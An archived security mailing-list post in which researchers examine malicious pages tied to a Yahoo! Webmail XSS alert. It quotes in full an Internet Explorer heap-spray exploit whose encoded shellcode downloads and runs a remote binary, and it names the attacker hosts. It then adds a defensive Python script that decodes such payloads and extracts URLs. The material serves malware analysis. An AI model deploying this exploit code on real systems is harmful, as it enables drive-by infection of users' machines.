Dailydave mailing list archives
RE: [Argeniss] Alert - Yahoo! Webmail XSS
From: "C programming List" <cprog.list () gmail com>
Date: Tue, 18 Apr 2006 17:54:23 -0400
The top page a level above that is quite interesting too. Although I'd only recommend browsing it with wget and notepad, to be on the safe side.

Should someone perhaps notify all those banks mentioned? (Then again, telling them "Watch out for suspicious CC transactions from eastern European nations" probably isn't telling them anything they don't already know....)

cheers,
DaveK

Looking at the front page on my regular browsers (firefox, galeon, konqueror), the 3 die; apparently, from what I see, the browser makes repetitive calls to mmap2:

mmap2(NULL, 524288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x8af82000

I don't know what he wants, but apparently it is just to map as much memory as possible. Does anyone know what script he uses to generate this?

There is also http://www.w00tynetwork.com/news.htm which has what I believe is an IE explorer exploit, maybe another browser, but Windows oriented.

<head>
<meta http-equiv="refresh" content="2;url=news.htm">
</head>
<input type="checkbox" id="javascript">
<SCRIPT language="javascript">
shellcode = unescape(
"%uCCE9%u0000%u5F00%u56E8%u0000%u8900%u50C3%u8E68%u0E4E%uE8EC" +
"%u0060%u0000%uC931%uB966%u6E6F%u6851%u7275%u6D6C%uFF54%u50D0" +
"%u3668%u2F1A%uE870%u0046%u0000%uC931%u5151%u378D%u8D56%u0877" +
"%u5156%uD0FF%u6853%uFE98%u0E8A%u2DE8%u0000%u5100%uFF57%u31D0" +
"%u49C9%u9090%u6853%uD87E%u73E2%u19E8%u0000%uFF00%u55D0%u6456" +
"%u30A1%u0000%u8B00%u0C40%u708B%uAD1C%u688B%u8908%u5EE8%uC35D" +
"%u5553%u5756%u6C8B%u1824%u458B%u8B3C%u0554%u0178%u8BEA%u184A" +
"%u5A8B%u0120%uE3EB%u4935%u348B%u018B%u31EE%uFCFF%uC031%u38AC" +
"%u74E0%uC107%u0DCF%uC701%uF2EB%u7C3B%u1424%uE175%u5A8B%u0124" +
"%u66EB%u0C8B%u8B4B%u1C5A%uEB01%u048B%u018B%uE9E8%u0002%u0000" +
"%uC031%uEA89%u5E5F%u5B5D%uE8C3%uFF2F%uFFFF%u6F61%u2E6C%u7865" +
"%u0065%u7468%u7074%u2F3A%u772F%u7777%u772E%u3030%u7974%u656E%u7774%u726F%u2E6B%u6F63%u2F6D%u6962%u616E%u7972%u2E32%u7865%u0065%u0000");
bigblock = unescape("%u9090%u9090");
slackspace = 20 + shellcode.length
while (bigblock.length < slackspace)
    bigblock += bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length + slackspace < 0x40000)
    block = block + block + fillblock;
memory = new Array();
for ( i = 0; i < 2020; i++ )
    memory[i] = block + shellcode;
var r = document.getElementById('javascript').createTextRange();
</script>

This shellcode downloads and execs this binary: http://www.w00tynetwork.com/binary2.exe. Does anyone know what the binary does?

I've tried to get the file that the XSS is going to download, but the address never replies:
http://211.22.14.50/.yahoomail/x.htm

A whois on the address gives a company named Ceraco International Co., Ltd., which I guess is a drone. Does anyone have any more on this web?

-daniel
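
For triage of a page like the one quoted in the message above, a `%u`-escaped `unescape()` argument can be decoded offline to recover embedded strings such as a download URL, without rendering the page in a browser. This is an added example, not part of the original post; `SAMPLE` is a constructed string and the function names are hypothetical.

```python
import re

# Constructed sample, not the payload from the post: filler units followed by
# a NUL-terminated ASCII string packed two characters per %uXXXX unit.
SAMPLE = ("%u9090%u9090%uCCCC"
          "%u7468%u7074%u2F3A%u652F%u6178%u706D%u656C%u692E"
          "%u766E%u6C61%u6469%u612F%u652E%u6578%u0000")

# JavaScript unescape() accepts %uXXXX, %XX, and literal characters.
_TOKEN = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})|(.)", re.S)


def unescape_to_bytes(text):
    """Decode like unescape(), then lay each UTF-16 code unit out
    little-endian, which is how the string sits in memory on x86."""
    out = bytearray()
    for m in _TOKEN.finditer(text):
        if m.group(1):
            out += int(m.group(1), 16).to_bytes(2, "little")
        elif m.group(2):
            out += int(m.group(2), 16).to_bytes(2, "little")
        else:
            out += m.group(3).encode("utf-16-le")
    return bytes(out)


def ascii_strings(data, min_len=6):
    """Return printable ASCII runs, like the strings(1) utility."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [s.decode("ascii") for s in re.findall(pattern, data)]


def embedded_urls(text):
    """Extract URL-shaped indicators from an escaped payload string."""
    urls = []
    for s in ascii_strings(unescape_to_bytes(text)):
        urls += re.findall(r"(?:https?|ftp)://[^\s\"'<>]+", s)
    return urls


if __name__ == "__main__":
    for url in embedded_urls(SAMPLE):
        # Defang before pasting into a ticket or chat.
        print(url.replace("http", "hxxp", 1).replace(".", "[.]"))
```

The byte swap matters: each `%uXXXX` unit stores its low byte first, so `%u7468` is the two characters `ht`, not `th`.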